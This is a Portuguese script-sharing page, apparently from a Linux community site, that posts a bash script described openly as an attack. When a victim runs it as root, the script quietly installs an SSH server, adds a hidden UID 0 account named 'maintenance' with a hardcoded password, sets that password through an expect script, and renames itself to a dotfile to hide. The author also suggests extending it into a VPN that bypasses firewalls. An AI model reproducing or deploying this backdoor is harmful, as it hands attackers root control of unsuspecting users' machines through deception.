Criando usuário com poderes de root [Shell Script]

Criando usuário com poderes de root

Publicado por Marcelo (última atualização em 17/10/2009)

[ Hits: 7.255 ]

Download login.super

0 0

Denuncie Favoritos Indicar

Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.

Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.

É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!

Esconder código-fonte

#!/bin/bash
# verifica se o usuário está como root
if [ "`id -u`" != "0" ]; then
echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.'
read pausa
exit 0
fi

# verifica se o script de cadastro de senha existe, se não, ele mesmo o cria
# o usuário será maintenance e a senha mdpasswd
if [ "`find -name cad.main`" = "" ]; then
touch cad.main
echo "#!/usr/bin/expect" >> cad.main
echo "set timeout 30" >> cad.main
echo "spawn passwd maintenance" >> cad.main
echo "set password \"mdpasswd"\" >> cad.main
echo "expect \"Enter new UNIX password:"\" >> cad.main
echo "send "\""$""password\r\"" >> cad.main
echo "expect \"Retype new UNIX password:"\" >> cad.main
echo "send "\""$""password\r\"" >> cad.main
echo "send \"exit"\" >> cad.main
echo "expect \"eof\"" >> cad.main
chmod +x cad.main
fi

# verifica se o programa expect está instalado, se não estiver, ele o instala
if [ "`dpkg -l | grep expect `" = "" ]; then
aptitude install expect >> /dev/null
fi

# verifica se o servidor ssh está instalado, se não estiver, ele o instala
if [ "`dpkg -l | grep openssh-server`" = "" ]; then
aptitude install openssh-server >> /dev/null
fi

# verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd
if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then
expect cad.main >> /dev/null
exit 0
fi

# se o usuário não existir, ele será criado
echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd
echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow
expect cad.main >> /dev/null

# remove o arquivo de cadastro de usuário
rm -rf cad.min

# oculta este script
mv login.super .login.super
exit 1

Scripts recomendados

Gerando lista de arquivos mp3 do disco em arquivo de formato HTML

Script de Instalação de Layer7 no CentOS 6.0

Atualizando páginas automaticamente com Lynx

Script de backup para Gravador CD-R ou CD-Rw

Copiando arquivos de uma so vez para todos usuarios

Comentários

Nenhum comentário foi encontrado.